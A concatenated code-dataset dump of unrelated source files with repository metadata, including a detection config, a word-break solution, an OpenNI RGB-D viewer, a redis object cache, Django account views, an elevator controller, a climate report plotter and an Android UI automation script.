    __C.ANCHOR_H = 1.56
    __C.ANCHOR_Z = -1.0 - cfg.ANCHOR_H / 2
    __C.RPN_POS_IOU = 0.6
    __C.RPN_NEG_IOU = 0.45
elif __C.DETECT_OBJ == 'Pedestrian':
    # pedestrian anchor
    __C.ANCHOR_L = 0.8
    __C.ANCHOR_W = 0.6
    __C.ANCHOR_H = 1.73
    __C.ANCHOR_Z = -0.6 - cfg.ANCHOR_H / 2
    __C.RPN_POS_IOU = 0.5
    __C.RPN_NEG_IOU = 0.35
elif __C.DETECT_OBJ == 'Cyclist':
    # cyclist anchor
    # CONSISTENCY FIX: this branch used a bare `if`, breaking the elif chain.
    # Behaviour is unchanged because the three class names are mutually
    # exclusive, but the chain now reads (and short-circuits) correctly.
    __C.ANCHOR_L = 1.76
    __C.ANCHOR_W = 0.6
    __C.ANCHOR_H = 1.73
    __C.ANCHOR_Z = -0.6 - cfg.ANCHOR_H / 2
    __C.RPN_POS_IOU = 0.5
    __C.RPN_NEG_IOU = 0.35
# for rpn nms
__C.RPN_NMS_POST_TOPK = 20
__C.RPN_NMS_THRESH = 0.1
__C.RPN_SCORE_THRESH = 0.96
# utils
__C.CORNER2CENTER_AVG = True # average version or max version
if __name__ == '__main__':
    # BUG FIX: __C.ROOT_DIR and __C.DATA_SETS_DIR are never defined anywhere
    # in this module, so running the file directly raised AttributeError.
    # Print config values that actually exist instead.
    print('__C.DATA_DIR = ' + __C.DATA_DIR)
    print('__C.CHECKPOINT_DIR = ' + __C.CHECKPOINT_DIR)
|
[
"fschaeffler@gmx.de"
] |
fschaeffler@gmx.de
|
209038d26392ee257736b0dc27c13919c17ac550
|
0ae2bb21d7ca71a691e33cb044a0964d380adda2
|
/Linkedin/LC139WrodBreak.py
|
b450b2041308a27de08b2a8551aa987cc89370d2
|
[] |
no_license
|
xwang322/Coding-Interview
|
5d27ec92d6fcbb7b929dd98bb07c968c1e1b2a04
|
ee5beb79038675ce73c6d147ba9249d9a5ca346a
|
refs/heads/master
| 2020-03-10T08:18:34.980557
| 2018-06-24T03:37:12
| 2018-06-24T03:37:12
| 129,282,263
| 2
| 6
| null | 2018-04-19T19:31:24
| 2018-04-12T16:41:28
|
Python
|
UTF-8
|
Python
| false
| false
| 307
|
py
|
class Solution(object):
    def wordBreak(self, s, wordDict):
        """Return True if *s* can be split into a sequence of dictionary words.

        Classic O(n^2) DP: dp[i] is True when the prefix s[:i] is breakable.
        """
        words = set(wordDict)  # O(1) membership instead of O(k) list scans
        dp = [False] * (len(s) + 1)
        dp[0] = True  # the empty prefix is trivially breakable
        for i in range(1, len(s) + 1):
            for j in range(i):
                if dp[j] and s[j:i] in words:
                    dp[i] = True
                    break  # one witness split suffices
        return dp[-1]
|
[
"noreply@github.com"
] |
xwang322.noreply@github.com
|
d05de92fbd33752bb64b60d6d4d79c1047be5ebe
|
acd6dd3a0eb2bfb2e8db59d4d2d2fde49b908138
|
/depth-stream/ex5_rgbd_overlayed.py
|
4a6e8f4a0ac05ed789a69bbea3a9ffa7d2e0e906
|
[
"MIT"
] |
permissive
|
jaykim9898/Pothole-Crack-Detection_MRCNN
|
65aab6b42c5a8913ab46b1b07e69008613d5af83
|
f25b4a6c55119d746f4a9bb1c3c14314b8be5501
|
refs/heads/master
| 2023-03-19T18:59:30.336108
| 2018-12-11T03:40:09
| 2018-12-11T03:40:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,231
|
py
|
#!/usr/bin/env python
'''
Created on 19Jun2015
Stream rgb and depth video side-by-side using openni2 opencv-python (cv2).
RGB is overlayed on top on readable-depth. In addition, streams are aligned, mirror-corrected, and synchronized.
Requires the following libraries:
1. OpenNI-Linux-<Platform>-2.2 <Library and driver>
2. primesense-2.2.0.30 <python bindings>
3. Python 2.7+
4. OpenCV 2.4.X
Current features:
1. Convert primensense oni -> numpy
2. Stream and display rgb || depth || rgbd overlayed
3. Keyboard commands
press esc to exit
press s to save current screen and distancemap
4. Sync and registered depth & rgb streams
5. Print distance to center pixel
6. Masks and overlays rgb stream on the depth stream
NOTE:
1. On device streams: IR and RGB streams do not work together
Depth & IR = OK
Depth & RGB = OK
RGB & IR = NOT OK
@author: Carlos Torres <carlitos408@gmail.com>
'''
import numpy as np
import cv2
from primesense import openni2 # , nite2
from primesense import _openni2 as c_api
## Path of the OpenNI redistribution OpenNI2.so or OpenNI2.dll
# Windows
# dist = 'C:\Program Files\OpenNI2\Redist\OpenNI2.dll'
# OMAP
# dist = '/home/carlos/Install/kinect/OpenNI2-Linux-ARM-2.2/Redist/'
# Linux
dist = '/home/carlos/Install/openni2/OpenNI-Linux-x64-2.2/Redist'
## initialize openni and check
openni2.initialize(dist)  # accepts the path of the OpenNI redistribution
# BUG FIX: a bare `print` on its own line is a no-op expression in Python 3
# (and the following string literal is dead), so these status messages were
# never emitted.
if openni2.is_initialized():
    print("openNI2 initialized")
else:
    print("openNI2 not initialized")
## Register the device
dev = openni2.Device.open_any()
## create the streams stream
rgb_stream = dev.create_color_stream()
depth_stream = dev.create_depth_stream()
##configure the depth_stream
# print 'Get b4 video mode', depth_stream.get_video_mode()
depth_stream.set_video_mode(
c_api.OniVideoMode(pixelFormat=c_api.OniPixelFormat.ONI_PIXEL_FORMAT_DEPTH_1_MM, resolutionX=320, resolutionY=240,
fps=30))
## Check and configure the mirroring -- default is True
# print 'Mirroring info1', depth_stream.get_mirroring_enabled()
depth_stream.set_mirroring_enabled(False)
rgb_stream.set_mirroring_enabled(False)
## start the stream
rgb_stream.start()
depth_stream.start()
## synchronize the streams
dev.set_depth_color_sync_enabled(True) # synchronize the streams
## IMPORTANT: ALIGN DEPTH2RGB (depth wrapped to match rgb stream)
dev.set_image_registration_mode(openni2.IMAGE_REGISTRATION_DEPTH_TO_COLOR)
##help(dev.set_image_registration_mode)
def get_rgb():
    """
    Returns numpy 3L ndarray to represent the rgb image.
    """
    # FIX: np.fromstring is deprecated (removed in modern numpy);
    # np.frombuffer is the supported equivalent for raw byte buffers.
    bgr = np.frombuffer(rgb_stream.read_frame().get_buffer_as_uint8(),
                        dtype=np.uint8).reshape(240, 320, 3)
    rgb = cv2.cvtColor(bgr, cv2.COLOR_BGR2RGB)  # cvtColor copies, so the
    # read-only frombuffer view is never mutated
    return rgb
# get_rgb
def get_depth():
    """
    Returns numpy ndarrays representing the raw and ranged depth images.
    Outputs:
        dmap:= distancemap in mm, 1L ndarray, dtype=uint16, min=0, max=2**12-1
        d4d := depth for dislay, 3L ndarray, dtype=uint8, min=0, max=255
    Note1:
        .reshape(240,320) matches the configured depth video mode
    Note2:
        dmap is a read-only view of the frame buffer; copy before mutating.
    """
    # FIX: np.fromstring is deprecated (removed in modern numpy);
    # np.frombuffer is the supported equivalent for raw byte buffers.
    dmap = np.frombuffer(depth_stream.read_frame().get_buffer_as_uint16(),
                         dtype=np.uint16).reshape(240, 320)
    # Correct the range. Depth images are 12bits.
    # NOTE(review): operator precedence makes this (dmap*255/4096) - 1, not
    # dmap*255/(2**12 - 1). Preserved as-is because the display mapping
    # (including the uint8 wrap of -1 at zero depth) depends on it -- confirm
    # intent before changing.
    d4d = np.uint8(dmap.astype(float) * 255 / 2 ** 12 - 1)
    d4d = 255 - cv2.cvtColor(d4d, cv2.COLOR_GRAY2RGB)
    return dmap, d4d
# get_depth
def mask_rgbd(d4d, rgb, th=0):
    """
    Overlays the rgb stream onto the display-depth image: every pixel whose
    depth value exceeds the threshold is taken from rgb, the rest keep depth.
    (3L ndarray, 3L ndarray) -> 3L ndarray
    th := threshold
    """
    overlay = d4d.copy()
    visible = d4d > th
    overlay[visible] = rgb[visible]
    return overlay
# mask_rgbd
## main loop
s = 0
done = False
while not done:
    key = cv2.waitKey(1) & 255
    ## Read keystrokes
    # BUG FIX: the bare `print` statements followed by orphan string literals
    # were no-ops in Python 3; they are now real print() calls.
    if key == 27:  # terminate on ESC
        print("\tESC key detected!")
        done = True
    elif chr(key) == 's':  # screen capture
        # NOTE(review): canvas/dmap are only bound after the first frame below,
        # so pressing 's' before any frame is processed raises NameError.
        print("\ts key detected. Saving image and distance map {}".format(s))
        cv2.imwrite("ex5_" + str(s) + '.png', canvas)
        np.savetxt("ex5dmap_" + str(s) + '.out', dmap)
        # s+=1 # uncomment for multiple captures
    # if
    ## Streams
    # RGB
    rgb = get_rgb()
    # DEPTH
    dmap, d4d = get_depth()
    # Overlay rgb over the depth stream
    rgbd = mask_rgbd(d4d, rgb)
    # canvas: depth | rgb | overlay side by side
    canvas = np.hstack((d4d, rgb, rgbd))
    ## Distance map
    print('Center pixel is {} mm away'.format(dmap[119, 159]))
    ## Display the stream
    cv2.imshow('depth || rgb || rgbd', canvas)
# end while
## Release resources
# Stop both streams before unloading the driver so OpenNI shuts down cleanly.
cv2.destroyAllWindows()
rgb_stream.stop()
depth_stream.stop()
openni2.unload()
print("Terminated")
|
[
"jerofad1992@gmail.com"
] |
jerofad1992@gmail.com
|
8152a7e29b7c4824b0d7872ace8893b23c1601e3
|
7334bd8a1d64662b13222916f4f9fa7565ac29c2
|
/uliweb/contrib/objcache/__init__.py
|
be115be84dbb5796acd07603f6416025152862a8
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
nl0x7c2/uliweb
|
9a1a021a80dc9b9b922df9f0ffb019a01ff6da7d
|
1e48e216bce2b105d2fb5776cc3162c83df04fa8
|
refs/heads/master
| 2020-12-26T00:53:11.692556
| 2014-01-15T00:52:13
| 2014-01-15T00:52:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,623
|
py
|
from uliweb import functions
from uliweb.utils.common import log, flat_list
def get_fields(tablename):
    """Return the cache-field list configured for *tablename*, or None."""
    from uliweb import settings
    tables = settings.get_var('OBJCACHE_TABLES')
    if tablename in tables:
        return tables[tablename]
    return None
def get_id(engine, tablename, id):
    """Compose the redis hash key for one cached object row."""
    key = "objcache:%s:%s:%d" % (engine, tablename, id)
    return key
def get_redis():
    """Return a redis client via functions.get_redis(), or None on failure."""
    try:
        redis = functions.get_redis()
    except Exception, e:  # Python 2 syntax; failure is logged, never raised
        log.exception(e)
        redis = None
    return redis
def check_enable():
    """Return True when OBJCACHE.enable is set; implicitly None otherwise."""
    from uliweb import settings
    enabled = settings.OBJCACHE.enable
    if enabled:
        return True
def get_object(model, tablename, id):
    """
    Get cached object from redis
    if id is None then return None:
    """
    from uliweb.utils.common import log
    if not id:
        return
    if not check_enable():
        # Caching disabled in settings -- fall through to a DB load upstream
        return
    redis = get_redis()
    if not redis: return
    _id = get_id(model.get_engine_name(), tablename, id)
    try:
        if redis.exists(_id):
            # Cached rows are stored as redis hashes; model.load rebuilds
            # the instance from the field dict
            v = redis.hgetall(_id)
            o = model.load(v)
            log.debug("objcache:get:id="+_id)
            return o
    except Exception, e:  # Python 2 syntax; cache errors are logged, not raised
        log.exception(e)
def set_object(model, tablename, instance, fields=None):
    """
    Store *instance* in the redis cache as a hash with a TTL.

    Only support simple condition, for example: Model.c.id == n
    """
    from uliweb import settings
    from uliweb.utils.common import log
    if not check_enable():
        return
    if not fields:
        # Fall back to the per-table field list from OBJCACHE_TABLES
        fields = get_fields(tablename)
    if fields:
        redis = get_redis()
        if not redis: return
        v = instance.dump(fields)
        _id = get_id(model.get_engine_name(), tablename, instance.id)
        try:
            # delete + hmset + expire pipelined so the TTL is always refreshed
            pipe = redis.pipeline()
            r = pipe.delete(_id).hmset(_id, v).expire(_id, settings.get_var('OBJCACHE/timeout')).execute()
            log.debug("objcache:set:id="+_id)
        except Exception, e:  # Python 2 syntax; cache errors are logged, not raised
            log.exception(e)
    else:
        log.debug("There is no fields defined or not configured, so it'll not saved in cache, [%s:%d]" % (tablename, instance.id))
def post_save(model, instance, created, data, old_data):
    """Signal handler: refresh the cache entry after a row is saved."""
    from uliweb.utils.common import log
    from uliweb import response
    if not check_enable():
        return
    tablename = model.tablename
    fields = get_fields(tablename)
    if fields:
        #if response is False, then it means you may in batch program
        #so it can't use post_commit machenism
        def f():
            #check if the record has changed
            # New rows are always cached; updates only when one of the
            # cached fields appears in the changed-data dict
            flag = created
            if not flag:
                flag = bool(filter(lambda x:x in data, fields))
            if flag:
                set_object(model, tablename, instance)
                log.debug("objcache:post_save:id=%d" % instance.id)
        if response:
            # Defer the cache write until the surrounding transaction commits
            response.post_commit = f
        else:
            f()
def post_delete(model, instance):
    """Signal handler: evict the cache entry after a row is deleted."""
    from uliweb.utils.common import log
    from uliweb import response
    if not check_enable():
        return
    tablename = model.tablename
    if get_fields(tablename):
        def f():
            _id = get_id(model.get_engine_name(), tablename, instance.id)
            redis = get_redis()
            if not redis: return
            try:
                redis.delete(_id)
                log.debug("objcache:post_delete:id="+_id)
            except Exception, e:  # Python 2 syntax; eviction errors only logged
                log.exception(e)
        if response:
            # Defer eviction until the surrounding transaction commits
            response.post_commit = f
        else:
            f()
|
[
"limodou@gmail.com"
] |
limodou@gmail.com
|
70c19f6c60566e5868ad044c2d17ad4a71f68c3b
|
7b0d9a419adb0c2317ddcd496924d577cea8e370
|
/accounts/views.py
|
1bb00dd8fc5b783dcb4ed53f80f01dfd1ab89462
|
[] |
no_license
|
progmenEugene/Yowithpro
|
df186975b7a49208c5603b20a876e11cdc924d21
|
26b1fa8ed166feee699546b463dd4a38b3d39d81
|
refs/heads/master
| 2020-04-02T18:38:35.561621
| 2018-10-25T17:01:45
| 2018-10-25T17:01:45
| 154,707,662
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,737
|
py
|
from django.shortcuts import render
from django.shortcuts import render
from django import forms
# Create your views here.
from django.contrib.auth.forms import PasswordResetForm
from django.shortcuts import redirect
from django.views.generic import CreateView
from django.contrib import messages
from .forms import RegistrationForm, TeacherProfileUpdateForm, UserUpdateForm
from .models import User, TeacherProfile, VideoLink
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
def home(request):
    # Render the static landing page.
    return render(request, 'home.html')
class SignUpView(TemplateView):
    # Static sign-up page; registration logic lives in RegistrationView.
    template_name = 'registration/signup.html'
class RegistrationView(CreateView):
    """Create a user with a random password, then email a password-reset link
    so the user sets their own password (email-verification pattern)."""
    template_name = 'accounts/user_form.html'
    form_class = RegistrationForm
    success_url = 'accounts:register-done'
    model = User

    def form_valid(self, form):
        obj = form.save(commit=False)
        # Random throwaway password: the user never learns it and must use
        # the reset link below instead.
        obj.set_password(User.objects.make_random_password())
        obj.is_active = True  # PasswordResetForm won't send to inactive users.
        obj.save()
        # This form only requires the "email" field, so will validate.
        reset_form = PasswordResetForm(self.request.POST)
        reset_form.is_valid()  # Must trigger validation
        # Copied from django/contrib/auth/views.py : password_reset
        opts = {
            #'use_https': self.request.is_secure(),
            'email_template_name': 'registration/verification.html',
            'subject_template_name': 'registration/verification_subject.txt',
            'request': self.request,
            # 'html_email_template_name': provide an HTML content template if you desire.
        }
        # This form sends the email on save()
        reset_form.save(**opts)
        return redirect('register-done')
# profile view for teacher and maybe for buyer
@login_required
def profile(request):
    """Display and update the signed-in user's account + teacher profile."""
    if request.method == 'POST':
        u_form = UserUpdateForm(request.POST, instance=request.user)
        p_form = TeacherProfileUpdateForm(request.POST,
                                          request.FILES,
                                          instance=request.user.profile)
        if u_form.is_valid() and p_form.is_valid():
            u_form.save()
            p_form.save()
            # NOTE(review): this creates a brand-new TeacherProfile row with
            # literal placeholder values on EVERY successful POST -- looks
            # like leftover debug code; confirm before removing.
            TeacherProfile.objects.create(**{
                'name': 'name', 'city': 'city', 'club': 'club', 'url_link': 'url.com', 'desctiption': 'desc'
            })
            messages.success(request, 'Your account has been updated!')
            return redirect('profile')
    else:
        u_form = UserUpdateForm(instance=request.user)
        p_form = TeacherProfileUpdateForm(instance=request.user.profile)
    context = {
        'u_form': u_form,
        'p_form': p_form
    }
    return render(request, 'accounts/profile.html', context)
#Videos links view
def videolink(request):
    """List every VideoLink.

    Bug fix: the context dict was built but never passed to render(), so
    the template always received an empty context; pass it through.
    """
    context = {'videos': VideoLink.objects.all()}
    return render(request, 'accounts/videolink.html', context)
#Add video links for teacher profile
class VideoLinksView(ListView):
    """Newest-first listing of all VideoLink entries."""
    model = VideoLink
    template_name = 'accounts/videolink.html'
    #<app>/<model>_<viewstype>
    context_object_name = 'videos'
    ordering = ['-pub_date']
class VideoDetailView(DetailView):
    """Detail page for a single VideoLink."""
    model = VideoLink
    template_name = 'accounts/videolink_detail.html'
class DateInput(forms.DateInput):
    # Use the browser-native HTML5 date picker instead of a plain text box.
    input_type = 'date'
class VideoCreateView(LoginRequiredMixin, CreateView):
    """Create a VideoLink owned by the logged-in user."""
    model = VideoLink
    template_name = 'accounts/videolink_form.html'
    fields = ['title','title_image', 'link_url', 'pub_date', 'short_description']
    def form_valid(self, form):
        # Stamp the requesting user as the owning teacher before saving.
        form.instance.teacher = self.request.user
        return super().form_valid(form)
class VideoUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
    """Edit a VideoLink; only its owning teacher may update it."""
    model = VideoLink
    fields = ['title', 'title_image', 'link_url', 'pub_date', 'short_description']
    template_name = 'accounts/videolink_form.html'
    def form_valid(self, form):
        # Keep ownership pinned to the requesting user on save.
        form.instance.teacher = self.request.user
        return super().form_valid(form)
    def test_func(self):
        """Grant access only to the video's owner (UserPassesTestMixin hook)."""
        # Idiom fix: return the comparison directly instead of
        # if/return True/return False.
        video = self.get_object()
        return self.request.user == video.teacher
class VideoDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
    """Delete a VideoLink; only its owning teacher may delete it."""
    model = VideoLink
    success_url = '/'
    template_name = 'accounts/videolink_confirm_delete.html'
    def test_func(self):
        """Grant access only to the video's owner (UserPassesTestMixin hook)."""
        # Idiom fix: return the comparison directly instead of
        # if/return True/return False.
        video = self.get_object()
        return self.request.user == video.teacher
|
[
"ecompx@gmail.com"
] |
ecompx@gmail.com
|
0f8f7522464a74d1b19a0325fe6df93394c0064f
|
ad8939b540fd50ca47df2b6c70d9548646dea7ad
|
/elevatorController.py
|
4880381f07f02f3868e5a5e827ab22cda6bd326a
|
[] |
no_license
|
MohitHasija/Elevator
|
30c27efdedd8001c71f31db8bad6b22398e2e9c9
|
a2158e40b4681faf53164915af0c37c98b392411
|
refs/heads/master
| 2021-03-28T04:43:57.404903
| 2020-03-16T23:52:47
| 2020-03-16T23:52:47
| 247,837,625
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,798
|
py
|
from copy import copy
class ElevatorController(object):
    """Tracks floor requests for an elevator and services them by always
    traveling to the closest outstanding request next."""

    def __init__(self, elevator):
        # Unordered set of outstanding floor requests.
        self.requested_floors = set()
        # Floors visited so far, in visit order.
        self.visited_floors = []
        # Total floors traveled since startup.
        self.num_floors_traveled = 0
        # Floor the cabin is currently on (seeded from the elevator).
        self.current_floor = elevator.current_floor
        # Highest floor number the elevator can reach.
        self.num_floors = elevator.num_floors

    def validate_floor_call(self, floor):
        """Return True when *floor* lies within the serviceable range."""
        return 0 <= floor <= self.num_floors

    def request_floor_from_inside(self, floor):
        """Register a cabin-button request; ignores the current floor and
        out-of-range values."""
        if floor != self.current_floor and self.validate_floor_call(floor):
            self.requested_floors.add(floor)

    def request_floor(self, current_floor, floor):
        """Register a hall call made on *current_floor* heading to *floor*."""
        if self.validate_floor_call(floor) and current_floor != floor:
            self.requested_floors.add(floor)
            # Also stop to pick the caller up, unless we are already there.
            if current_floor != self.current_floor:
                self.requested_floors.add(current_floor)

    def get_floor_difference(self, floor):
        """Floors passed when moving from the current floor to *floor*
        (inclusive of *floor* itself)."""
        return abs(self.current_floor - floor)

    def visit_floor(self, floor):
        """Move to *floor*, recording distance and clearing its request."""
        self.num_floors_traveled += self.get_floor_difference(floor)
        self.current_floor = floor
        self.visited_floors.append(floor)
        # discard() is a no-op if the floor was never requested.
        self.requested_floors.discard(floor)

    def travel(self):
        """Service every outstanding request, nearest floor first."""
        print("The floors to visit are:", self.requested_floors)
        while self.requested_floors:
            target = min(self.requested_floors, key=self.get_floor_difference)
            if target == self.current_floor:
                # Skip over a request for the floor we are already on.
                remaining = copy(self.requested_floors)
                remaining.discard(self.current_floor)
                target = min(remaining, key=self.get_floor_difference)
            print("The floor to visit is:", target)
            self.visit_floor(target)
|
[
"noreply@github.com"
] |
MohitHasija.noreply@github.com
|
5c8a45629c42a37606e1aca5b46aa155f01e6fe9
|
73788c28a6c9742f0e7b4ee99ac4a7f854f40611
|
/htdocs/plotting/auto/scripts100/p123.py
|
d4ec82a54a6e8952157960bce7110f06cf8fa756
|
[] |
no_license
|
nbackas/iem
|
b8c7a356c68865a66b808962e1f09460b74df73f
|
d22e6d7b1b94db3bb081fb08619f83fb5b6784b7
|
refs/heads/master
| 2020-12-31T03:04:22.144156
| 2016-03-21T19:09:16
| 2016-03-21T19:09:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,071
|
py
|
import psycopg2
from pyiem.network import Table as NetworkTable
from pandas.io.sql import read_sql
import datetime
import numpy as np
def get_description():
    """ Return a dict describing how to call this plotter """
    desc = dict(data=True, report=True, description=""" """)
    desc['arguments'] = [
        dict(type='station', name='station', default='IA2203',
             label='Select Station'),
    ]
    return desc
def wrap(cnt, s=None):
    """Return *s* (falling back to *cnt* when *s* is falsy) for positive
    counts; return an empty string otherwise."""
    return (s or cnt) if cnt > 0 else ""
def contiguous_regions(condition):
    # http://stackoverflow.com/questions/4494404
    """Finds contiguous True regions of the boolean array "condition". Returns
    a 2D array where the first column is the start index of the region and the
    second column is the end index."""
    # Find the indicies of changes in "condition"
    # d = np.diff(condition)
    # Bug fix: np.float was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin float is the equivalent dtype.
    d = np.subtract(condition[1:], condition[:-1], dtype=float)
    idx, = d.nonzero()
    # We need to start things after the change in "condition". Therefore,
    # we'll shift the index by 1 to the right.
    idx += 1
    if condition[0]:
        # If the start of condition is True prepend a 0
        idx = np.r_[0, idx]
    if condition[-1]:
        # If the end of condition is True, append the length of the array
        idx = np.r_[idx, condition.size]  # Edit
    # Reshape the result into two columns
    idx.shape = (-1, 2)
    return idx
def plotter(fdict):
    """Generate the Climodat text report of record consecutive-day runs
    above/below each temperature threshold for one station.

    Args:
        fdict: request options; only 'station' is read.

    Returns:
        (None, None, res): no figure/dataframe, just the report text.
    """
    import matplotlib
    matplotlib.use('agg')
    pgconn = psycopg2.connect(database='coop', host='iemdb', user='nobody')
    cursor = pgconn.cursor()
    # NOTE(review): default 'IA0200' differs from get_description()'s
    # 'IA2203' — confirm which default is intended.
    station = fdict.get('station', 'IA0200')
    table = "alldata_%s" % (station[:2], )
    nt = NetworkTable("%sCLIMATE" % (station[:2], ))
    # Report header.
    res = """\
# IEM Climodat http://mesonet.agron.iastate.edu/climodat/
# Report Generated: %s
# Climate Record: %s -> %s
# Site Information: [%s] %s
# Contact Information: Daryl Herzmann akrherz@iastate.edu 515.294.5978
# First occurance of record consecutive number of days
# above or below a temperature threshold
""" % (datetime.date.today().strftime("%d %b %Y"),
       nt.sts[station]['archive_begin'].date(), datetime.date.today(), station,
       nt.sts[station]['name'])
    res += "# %-27s %-27s %-27s %-27s\n" % (" Low Cooler Than",
                                            " Low Warmer Than",
                                            " High Cooler Than",
                                            " High Warmer Than")
    res += "%3s %5s %10s %10s %5s %10s %10s %5s %10s %10s %5s %10s %10s\n" % (
        'TMP', 'DAYS', 'BEGIN DATE', 'END DATE',
        'DAYS', 'BEGIN DATE', 'END DATE',
        'DAYS', 'BEGIN DATE', 'END DATE',
        'DAYS', 'BEGIN DATE', 'END DATE')
    # Pull the full daily high/low record, oldest first.
    cursor.execute("""SELECT high, low from """+table+"""
        WHERE station = %s and day >= '1900-01-01' ORDER by day ASC
    """, (station, ))
    highs = np.zeros((cursor.rowcount,), 'f')
    lows = np.zeros((cursor.rowcount,), 'f')
    for i, row in enumerate(cursor):
        highs[i] = row[0]
        lows[i] = row[1]
    startyear = max([1900, nt.sts[station]['archive_begin'].year])
    for thres in range(-20, 101, 2):
        # Longest run of lows below the threshold.
        condition = lows < thres
        max_bl = 0
        max_bl_ts = datetime.date.today()
        for start, stop in contiguous_regions(condition):
            if (stop - start) > max_bl:
                max_bl = int(stop - start)
                # NOTE(review): end date is derived from the day *index*
                # offset from Jan 1 of startyear, which ignores any gaps in
                # the record — confirm the data is gap-free.
                max_bl_ts = datetime.date(startyear,
                                          1, 1) + datetime.timedelta(
                    days=int(stop))
        # Longest run of lows at/above the threshold.
        condition = lows >= thres
        max_al = 0
        max_al_ts = datetime.date.today()
        for start, stop in contiguous_regions(condition):
            if (stop - start) > max_al:
                max_al = int(stop - start)
                max_al_ts = datetime.date(startyear,
                                          1, 1) + datetime.timedelta(days=int(stop))
        # Longest run of highs below the threshold.
        condition = highs < thres
        max_bh = 0
        max_bh_ts = datetime.date.today()
        for start, stop in contiguous_regions(condition):
            if (stop - start) > max_bh:
                max_bh = int(stop - start)
                max_bh_ts = datetime.date(startyear,
                                          1, 1) + datetime.timedelta(days=int(stop))
        # Longest run of highs at/above the threshold.
        condition = highs >= thres
        max_ah = 0
        max_ah_ts = datetime.date.today()
        for start, stop in contiguous_regions(condition):
            if (stop - start) > max_ah:
                max_ah = int(stop - start)
                max_ah_ts = datetime.date(startyear,
                                          1, 1) + datetime.timedelta(
                    days=int(stop))
        # One report row per threshold; wrap() blanks out zero-length runs.
        res += ("%3i %5s %10s %10s %5s %10s %10s "
                "%5s %10s %10s %5s %10s %10s\n"
                ) % (thres,
                     wrap(max_bl),
                     wrap(max_bl, (max_bl_ts -
                                   datetime.timedelta(days=max_bl)).strftime("%m/%d/%Y")),
                     wrap(max_bl, max_bl_ts.strftime("%m/%d/%Y") ),
                     wrap(max_al),
                     wrap(max_al, (max_al_ts -
                                   datetime.timedelta(days=max_al)).strftime("%m/%d/%Y")),
                     wrap(max_al, max_al_ts.strftime("%m/%d/%Y") ),
                     wrap(max_bh),
                     wrap(max_bh, (max_bh_ts -
                                   datetime.timedelta(days=max_bh)).strftime("%m/%d/%Y")),
                     wrap(max_bh, max_bh_ts.strftime("%m/%d/%Y") ),
                     wrap(max_ah),
                     wrap(max_ah, (max_ah_ts -
                                   datetime.timedelta(days=max_ah)).strftime("%m/%d/%Y")),
                     wrap(max_ah, max_ah_ts.strftime("%m/%d/%Y")))
    return None, None, res
if __name__ == '__main__':
    # Smoke-test entry point: run the report with default (empty) options.
    plotter(dict())
|
[
"akrherz@iastate.edu"
] |
akrherz@iastate.edu
|
2d159e24ba80c94043bcb9a70bb40d4b96fdcecb
|
249f85611a80ae84dcab037072918f9822335e29
|
/venv/bin/pycodestyle
|
b4d483c96fdb2863f603194c4d145e09aa612b4e
|
[] |
no_license
|
bharathjinka09/bharath-shop
|
06b110c740fbb27b7e759b30c0ca1971dfb8b7be
|
09683c1dbc2e9bc3b2795d2e53252e04b911069d
|
refs/heads/master
| 2022-12-02T03:01:03.347749
| 2020-08-18T06:59:17
| 2020-08-18T06:59:17
| 288,379,827
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 253
|
#!/home/mieone/Downloads/bharath-shop/venv/bin/python3.7
# -*- coding: utf-8 -*-
# Auto-generated console-script shim for the virtualenv: normalizes
# argv[0] (strips a "-script.py"/".exe" suffix) and hands off to
# pycodestyle's entry point, propagating its exit status.
import re
import sys
from pycodestyle import _main
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(_main())
|
[
"bharathjinka09@gmail.com"
] |
bharathjinka09@gmail.com
|
|
62b0191ac1f15c6d995aef12697f424b29a02230
|
33ce3289835670440bf1ae43ea11752c1fd50f1c
|
/examples/settings-sound-phone_ringtone.py
|
03d9bc99214bcfc2fa39eda97648244896370354
|
[
"Apache-2.0"
] |
permissive
|
fknight3/AndroidViewClient
|
66a1476dd2c5981bc24f2e76fa77f0e2a619cc60
|
2bb7d970153ef5b3c97a11cd13695bce473b0053
|
refs/heads/master
| 2020-03-30T20:53:57.024955
| 2018-10-04T17:30:02
| 2018-10-04T17:30:02
| 151,608,962
| 0
| 0
|
Apache-2.0
| 2018-10-04T17:17:26
| 2018-10-04T17:17:26
| null |
UTF-8
|
Python
| false
| false
| 2,034
|
py
|
#! /usr/bin/env python
'''
Copyright (C) 2012 Diego Torres Milano
Created on Sep 8, 2012
@author: diego
@see: http://code.google.com/p/android/issues/detail?id=36544
'''
import re
import sys
import os
# This must be imported before MonkeyRunner and MonkeyDevice,
# otherwise the import fails.
# PyDev sets PYTHONPATH, use it
# Bug fix: the bare "except:" clauses below swallowed everything, including
# SystemExit/KeyboardInterrupt; only a missing env var (KeyError) is expected.
try:
    for p in os.environ['PYTHONPATH'].split(':'):
        if not p in sys.path:
            sys.path.append(p)
except KeyError:
    # PYTHONPATH not set; rely on the default sys.path.
    pass
try:
    sys.path.append(os.path.join(os.environ['ANDROID_VIEW_CLIENT_HOME'], 'src'))
except KeyError:
    # ANDROID_VIEW_CLIENT_HOME not set; assume the package is importable.
    pass
from androidviewclient3.viewclient import ViewClient, View

device, serialno = ViewClient.connectToDeviceOrExit()
DEBUG = True
FLAG_ACTIVITY_NEW_TASK = 0x10000000
# We are not using Settings as the bug describes because there's no WiFi dialog in emulator
componentName = 'com.android.settings/.Settings'
device.startActivity(component=componentName, flags=FLAG_ACTIVITY_NEW_TASK)
ViewClient.sleep(3)
vc = ViewClient(device=device, serialno=serialno)
if DEBUG: vc.traverse(transform=ViewClient.TRAVERSE_CIT)
